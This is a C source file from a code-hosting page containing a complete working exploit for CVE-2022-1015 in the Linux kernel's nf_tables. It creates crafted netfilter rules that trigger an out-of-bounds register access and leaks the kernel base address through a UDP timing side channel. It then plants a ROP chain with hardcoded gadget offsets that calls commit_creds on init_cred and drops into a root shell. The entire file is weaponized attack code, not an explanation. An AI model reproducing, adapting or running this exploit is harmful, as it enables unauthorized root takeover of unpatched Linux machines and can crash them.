-
Notifications
You must be signed in to change notification settings - Fork 31
/
Copy pathpwn.c
615 lines (463 loc) · 18.3 KB
/
pwn.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
/*
* ----------------------------------------------------------------------------
* "THE BEER-WARE LICENSE" (Revision 42):
* David Bouman (pql) wrote this file. As long as you retain this notice you
* can do whatever you want with this stuff. If we meet some day, and you think
* this stuff is worth it, you can buy me a beer in return. Signed, David.
* ----------------------------------------------------------------------------
*/
#define _GNU_SOURCE 1
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <stddef.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <sys/mman.h>
#include <sched.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/prctl.h>
#include <linux/limits.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>
#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
#include <libnftnl/rule.h>
#include <libnftnl/expr.h>
#include "helpers.h"
struct vuln_expr_params {
uint32_t min_len;
uint32_t max_len;
uint32_t value;
};
void setup_nftables(struct mnl_socket* nl, char* table_name, char* base_chain_name, int* seq)
{
if (create_table(nl, table_name, AF_INET, seq, NULL) == -1) {
perror("Failed creating table");
exit(EXIT_FAILURE);
}
printf("[+] Created nft %s\n", table_name);
struct unft_base_chain_param bp;
bp.hook_num = NF_INET_LOCAL_OUT;
bp.prio = 10;
if (create_chain(nl, table_name, base_chain_name, NFPROTO_IPV4, &bp, seq, NULL)) {
perror("Failed creating base chain");
exit(EXIT_FAILURE);
}
printf("[+] Created base ipv4 chain %s\n", base_chain_name);
}
static int calc_vuln_expr_params_div(struct vuln_expr_params* result, uint8_t desired, uint32_t min_len, uint32_t max_len, int shift)
{
uint64_t base_ = (uint64_t)(1) << (32 - shift);
uint32_t base = (uint32_t)(base_ - 1);
if (base == 0xffffffff) {
base = 0xfffffffb; // max actual value
}
for (;;) {
uint64_t computed = (base * 4) & 0xffffffff;
uint64_t max_value = computed + (uint64_t)(max_len);
if (max_value < ((uint64_t)(1) << 32)) {
break;
}
if ( (base & 0xff) != desired) {
base--;
continue;
}
uint32_t len_at_least = ((uint64_t)1 << 32) - computed;
uint32_t len_at_most = len_at_least + 0x50;
if (min_len > len_at_least) {
len_at_least = min_len;
}
if (max_len < len_at_most) {
len_at_most = max_len;
}
result->max_len = len_at_most;
result->min_len = len_at_least;
result->value = base + 4;
return 0;
}
return -1;
}
static int calc_vuln_expr_params(struct vuln_expr_params *result, uint8_t desired, uint32_t min_len, uint32_t max_len)
{
for (int i = 0; i < 3; ++i) {
int res = calc_vuln_expr_params_div(result, desired, min_len, max_len, i);
if (!res) {
return 0;
}
}
return -1;
}
#define MAGIC 0xdeadbeef0badc0de
int create_base_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq)
{
struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);
// we start by adding a rule to fetch the destination port
// UDP header destination port starts at offset +2 and is 2 bytes long
// we store the result in register 8
rule_add_payload(r, NFT_PAYLOAD_TRANSPORT_HEADER, offsetof(struct udphdr, dest), sizeof(uint16_t), 8);
// if the destination port does not match, the rule will accept the packet. This will save us a lot of noise,
// including noise generated by packets sent by our server socket.
// the server sockets actually have a different stack layout than the client sockets in do_chain, so this is essential.
uint16_t dest_port = htons(9999);
rule_add_cmp(r, NFT_CMP_EQ, 8, &dest_port, sizeof dest_port);
// then, we fetch the first 8 bytes of the the inner header.
// these need to match our magic value, or else the rule will accept the packet.
// we do this as a failsafe that guarantees we only process packets we
// actually want to process.
rule_add_payload(r, NFT_PAYLOAD_INNER_HEADER, 0, 8, 8);
uint64_t magic = MAGIC;
rule_add_cmp(r, NFT_CMP_EQ, 8, &magic, sizeof magic);
// If the packet passed these checks, we jump to the auxiliary chain
rule_add_immediate_verdict(r, NFT_GOTO, "aux_chain");
// Commit rule to the kernel
return send_batch_request(
nl,
NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
NLM_F_CREATE, family, (void**)&r, seq,
NULL
);
}
int create_infoleak_rule(
struct mnl_socket* nl, struct nftnl_rule* r, uint8_t cmp, uint8_t pos, uint16_t family, int* seq, int extraflags)
{
struct vuln_expr_params vuln_params;
// index 0xff translates to +0x3fc, and there's a kernel address that we can grab.
if (calc_vuln_expr_params(&vuln_params, 0xff, 0x40, 0x40)) {
puts("Could not find correct params to trigger OOB read.");
return -1;
}
// we shift by pos*8 so that the first byte of the register will be the one at pos `pos`.
uint32_t shift_amt = (pos * 8);
rule_add_bit_shift(r, NFT_BITWISE_RSHIFT, vuln_params.min_len, vuln_params.value, 1, &shift_amt, sizeof shift_amt);
// we compare it to the constant - we can binary search
// if the compared value is greater than our supplied value,
// we accept the packet. Else, we drop it.
rule_add_cmp(r, NFT_CMP_GT, 0x15, &cmp, 1);
rule_add_immediate_verdict(r, NF_DROP, NULL);
return send_batch_request(
nl,
NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
NLM_F_CREATE | extraflags, family, (void**)&r, seq,
NULL
);
}
#define INFOLEAK_RULE_HANDLE 4
uint8_t do_leak_byte(struct mnl_socket* nl, int client_sock, struct sockaddr_in* addr, char* table_name, char* aux_chain_name, uint8_t pos, int* seq)
{
uint8_t low = 0;
uint8_t high = 255;
uint8_t mid;
char msg[16] = {};
char result[16] = {};
*(uint64_t*)msg = MAGIC;
for(;;) {
mid = (high + low) / 2;
printf("bounds (inclusive): [0x%.2hhx, 0x%.2hhx]\n", low, high);
if (low == high) {
return mid;
}
// Create a rule that replaces the rule with handle INFOLEAK_RULE_HANDLE
struct nftnl_rule* r = build_rule(table_name, aux_chain_name, NFPROTO_IPV4, NULL);
nftnl_rule_set_u64(r, NFTNL_RULE_HANDLE, INFOLEAK_RULE_HANDLE);
// The rule is going to compare
if (create_infoleak_rule(nl, r, mid, pos, NFPROTO_IPV4, seq, NLM_F_REPLACE)) {
perror("Could not replace infoleak rule");
exit(EXIT_FAILURE);
}
sendto(client_sock, msg, sizeof msg, 0, (struct sockaddr*)addr, sizeof *addr);
struct sockaddr_in presumed_server_addr;
socklen_t presumed_server_addr_len = sizeof presumed_server_addr;
int nrecv = recvfrom(client_sock, result, sizeof result, 0, (struct sockaddr*)&presumed_server_addr, &presumed_server_addr_len);
if (!nrecv) {
puts("[-] Remote socket closed...");
exit(EXIT_FAILURE);
} else if (nrecv < 0) {
// In case of timeout, value is greater than `mid`
low = mid + 1;
} else {
if (strcmp(result, "MSG_OK")) {
puts("[-] Something went wrong...");
exit(EXIT_FAILURE);
}
memset(result, 0, sizeof result);
// But if we get a response, the packet arrived at the server and therefore the value is lower than or equal to mid
high = mid;
}
}
}
uint32_t do_leak(struct mnl_socket* nl, struct sockaddr_in* addr, char* table_name, char* aux_chain_name, int* seq)
{
#define CLIENT_HOST "127.0.0.1"
#define CLIENT_PORT 8888
int client_sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
struct sockaddr_in client_addr;
inet_aton(CLIENT_HOST, &client_addr.sin_addr);
client_addr.sin_port = htons(CLIENT_PORT);
client_addr.sin_family = AF_INET;
if (bind(client_sock, (struct sockaddr*)&client_addr, sizeof client_addr) < 0) {
perror("client bind");
return -1;
}
// 100ms receive timeout
// can probably be lower
struct timespec t = {.tv_sec = 0, .tv_nsec = 1000 * 200};
setsockopt(client_sock, SOL_SOCKET, SO_RCVTIMEO, &t, sizeof t);
uint8_t results[4] = {};
for(int i = 1; i < 4; ++i) {
results[i] = do_leak_byte(nl, client_sock, addr, table_name, aux_chain_name, i, seq);
printf("[+] Leaked byte %i: %.2hhx\n", i, results[i]);
}
close(client_sock);
return *(uint32_t*)results;
}
int simple_handler(int fd)
{
char buf[4096] = {};
struct sockaddr_in client_addr = {};
socklen_t client_addr_size = sizeof client_addr;
size_t conn_id = 0;
for (;;) {
int len = recvfrom(fd, buf, sizeof buf - 1, 0, (struct sockaddr*)&client_addr, &client_addr_size);
if (len <= 0) {
printf("listener receive failed..\n");
perror("");
return -1;
}
printf("Received message from [%s:%d] (udp) (0x%x bytes):\n", inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port), len);
hexdump(buf, len, 8);
}
close(fd);
return 0;
}
int leak_handler(int fd)
{
char buf[4096] = {};
char send_back[] = "MSG_OK";
struct sockaddr_in client_addr = {};
socklen_t client_addr_size = sizeof client_addr;
size_t conn_id = 0;
for (;;) {
int len = recvfrom(fd, buf, sizeof buf - 1, 0, (struct sockaddr*)&client_addr, &client_addr_size);
if (len <= 0) {
printf("listener receive failed..\n");
perror("");
return -1;
}
sendto(fd, send_back, sizeof(send_back), 0, (struct sockaddr*)&client_addr, client_addr_size);
}
close(fd);
return 0;
}
void* new_stack;
/* This is where we return after our rop chain */
extern void _after_rop();
void after_rop()
{
system("id");
system("sh");
}
static int install_rop_chain_rule(struct mnl_socket* nl, uint64_t kernel_base, char* chain, int* seq)
{
// return address is at regs.data[0xca]
struct vuln_expr_params v;
if (calc_vuln_expr_params(&v, 0xca, 0x00, 0xff)) {
puts("[-] Cannot find suitable parameters for planting ROP chain.");
return -1;
}
struct nftnl_rule* r = build_rule("exploit_table", chain, NFPROTO_IPV4, NULL);
//nftnl_rule_set_u64(r, NFTNL_RULE_HANDLE, INFOLEAK_RULE_HANDLE);
rule_add_payload(r, NFT_PAYLOAD_INNER_HEADER, 8, v.max_len, v.value);
int err = send_batch_request(
nl,
NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
NLM_F_CREATE, NFPROTO_IPV4, (void**)&r, seq,
NULL
);
if (err) {
perror("send_batch_request");
return err;
}
return v.max_len;
}
void trigger_rop(struct mnl_socket* nl, uint64_t kernel_base, struct sockaddr_in* magic_addr, int rop_length)
{
// Structures in .data
#define INIT_NSPROXY_OFF 0x1867360
#define INIT_PID_NS_OFF 0x1866fe0
#define INIT_CRED_OFF 0x18675a0
// Routines in .text
#define SWITCH_TASK_NAMESPACES_OFF 0xd1040
#define COMMIT_CREDS_OFF 0xd2430
#define FIND_TASK_BY_VPID_OFF 0x0c8c80
#define BPF_GET_CURRENT_TASK_OFF 0x1ebde0
#define __DO_SOFTIRQ_OFF 0x1000000
// Gadgets
#define MOV_RDI_RAX_OFF 0xc032fb // constraint: rcx==0
#define POP_RDI_OFF 0x92610
#define POP_RSI_OFF 0x676d2
#define POP_RCX_OFF 0x139a3
#define POP_RBP_OFF 0x6ffa8d
#define XOR_ECX_ECX_OFF 0x7110bf
#define MOV_R13_RCX_POP_RBP_OFF 0xaf089b
#define POP_R11_R12_RBP_OFF 0x054645
#define CLI_OFF 0x4df88b
#define STI_OFF 0xc061c0
#define MOV_RCX_RAX_OFF 0x2faad4
#define SWAPGS_SYSRETQ_OFF 0xe000fb
// Misc.
#define OLD_TASK_FLAGS_OFF 0x1a554a // 0x40010000
uint64_t *packet = calloc(1, rop_length + 8);
packet[0] = 0;
uint64_t* rop = &packet[1];
// 0xffffffff819d5cda <__netif_receive_skb_one_core+122> ret
int i = 0;
#define _rop(x) do { if ((i+1)*8 > rop_length) { puts("ROP TOO LONG"); exit(EXIT_FAILURE);} rop[i++] = (x); } while (0)
// clear interrupts
_rop(kernel_base + CLI_OFF);
// make rbp-0x58 point to 0x40010000
_rop(kernel_base + POP_RBP_OFF);
_rop(kernel_base + OLD_TASK_FLAGS_OFF + 0x58);
/* Cleanly exit softirq and return to syscall context */
_rop(kernel_base + __DO_SOFTIRQ_OFF + 418);
// stack frame was 0x60 bytes
for(int j = 0; j < 12; ++j) _rop(0);
/* We're already on 128 bytes here */
// switch_task_namespaces(current, &init_nsproxy)
_rop(kernel_base + BPF_GET_CURRENT_TASK_OFF);
_rop(kernel_base + MOV_RDI_RAX_OFF); // rcx happens to aleady be 0
_rop(kernel_base + POP_RSI_OFF);
_rop(kernel_base + INIT_NSPROXY_OFF);
_rop(kernel_base + SWITCH_TASK_NAMESPACES_OFF);
// commit_cred(&init_cred)
_rop(kernel_base + POP_RDI_OFF);
_rop(kernel_base + INIT_CRED_OFF);
_rop(kernel_base + COMMIT_CREDS_OFF);
// pass control to system call stack
// this is offset +0xc0 from our rop chain
// target is at +0x168
_rop(kernel_base + 0x28b2e4); // add rsp, 0x90; pop rbx; pop rbp; ret
int s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
puts("Triggering payload..");
sendto(s, packet, rop_length + 8, 0, (struct sockaddr*)magic_addr, sizeof *magic_addr);
}
int main(int argc, char** argv, char** envp)
{
if (argc < 2) {
puts("[+] Dropping into network namespace");
// We're too lazy to perform uid mapping and such.
char* new_argv[] = {
"/usr/bin/unshare",
"-Urn",
argv[0],
"EXPLOIT",
NULL
};
execve(new_argv[0], new_argv, envp);
puts("Couldn't start unshare wrapper..");
puts("Recompile the exploit with an appropriate unshare path.");
exit(EXIT_FAILURE);
}
if (strcmp("EXPLOIT", argv[1])) {
puts("[-] Something went wrong...");
exit(EXIT_FAILURE);
}
// I'm too lazy to talk to NETLINK_ROUTE..
// Deal with it!
system("ip link set dev lo up");
struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
perror("[-] mnl_socket_bind");
puts("[-] Are you sure you have CAP_NET_ADMIN?..");
exit(EXIT_FAILURE);
}
int seq = time(NULL);
int err;
char *table_name = "exploit_table",
*base_chain_name = "base_chain",
*aux_chain_name = "aux_chain";
setup_nftables(nl, table_name, base_chain_name, &seq);
if (create_chain(nl, table_name, aux_chain_name, NFPROTO_IPV4, NULL, &seq, NULL)) {
perror("Failed creating auxiliary chain");
exit(EXIT_FAILURE);
}
printf("[+] Created auxiliary chain %s\n", aux_chain_name);
if (create_base_chain_rule(nl, table_name, base_chain_name, NFPROTO_IPV4, NULL, &seq)) {
perror("Failed creating base chain rule");
exit(EXIT_FAILURE);
}
puts("[+] Created base chain rule");
// we need to make a rule first in order to replace it
// in our leaky rule creation. it's a bit of a hack but it works
// We can also use it to determine whether the system is vulnerable
// before actually exploiting.
struct vuln_expr_params v;
// offset 0xca and len 0xff is OOB
if (calc_vuln_expr_params(&v, 0xca, 0x00, 0xff)) {
puts("[-] Something went horribly wrong...");
exit(EXIT_FAILURE);
}
struct nftnl_rule* aux_rule = build_rule(table_name, aux_chain_name, NFPROTO_IPV4, NULL);
rule_add_payload(aux_rule, NFT_PAYLOAD_INNER_HEADER, 8, v.max_len, v.value);
err = send_batch_request(
nl,
NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
NLM_F_CREATE, NFPROTO_IPV4, (void**)&aux_rule, &seq,
NULL
);
if (err) {
puts(CLR_RED "[+] TARGET IS NOT VULNERABLE to CVE-2022-1015!" CLR_RESET);
exit(EXIT_FAILURE);
}
puts("[+] Succesfully created rule with OOB nft_payload!");
puts(CLR_GRN "[+] TARGET IS VULNERABLE to CVE-2022-1015!" CLR_RESET);
puts("[+] Type 'y' to try exploiting the target.");
puts(CLR_RED "!!!BEWARE: THIS IS LIKELY TO CAUSE A KERNEL PANIC!!!" CLR_RESET);
char a[4] = {};
read(0, a, 1);
if (a[0] != 'y') {
puts("Bye!");
exit(EXIT_SUCCESS);
}
#define SERVER_HOST "127.0.0.1"
#define SERVER_PORT 9999
int pid = setup_listener(SERVER_HOST, SERVER_PORT, leak_handler);
struct sockaddr_in server;
inet_aton(SERVER_HOST, &server.sin_addr);
server.sin_port = htons(SERVER_PORT);
server.sin_family = AF_INET;
#define LEAK_BASE_OFFSET 0x9ac3ec
uint32_t leak = do_leak(nl, &server, table_name, aux_chain_name, &seq);
// first byte might fail due to buggy carry implementation with shift_amt = 0
// so we just set it. The LSB will always remain constant.
uint64_t kernel_addr = 0xffffffff00000000 + leak + (LEAK_BASE_OFFSET & 0xff);
uint64_t kernel_base = kernel_addr - LEAK_BASE_OFFSET;
// If the kernel base isn't aligned we should probably not continue.
if((kernel_base & 0xfffff) != 0) {
puts("[-] Leak failed.");
puts("[-] Try changing offsets / lengths / chain types.");
puts("[-] If all leaked bytes were ff, this is probably because of corrupted loopback state.. RIP");
exit(EXIT_FAILURE);
}
printf("[+] Kernel base @ 0x%.16lx\n", kernel_base);
stop_listener(pid);
struct unft_base_chain_param bp;
bp.hook_num = NF_INET_LOCAL_IN;
bp.prio = 10;
if (create_chain(nl, table_name, "base_chain_2", NFPROTO_IPV4, &bp, &seq, NULL)) {
perror("Failed adding second base chain");
exit(EXIT_FAILURE);
}
err = install_rop_chain_rule(nl, kernel_base, "base_chain_2", &seq);
if (err < 0) {
perror("[-] Could not install ROP chain");
exit(EXIT_FAILURE);
};
new_stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) + 0x3ff0;
trigger_rop(nl, kernel_base, &server, err);
after_rop();
}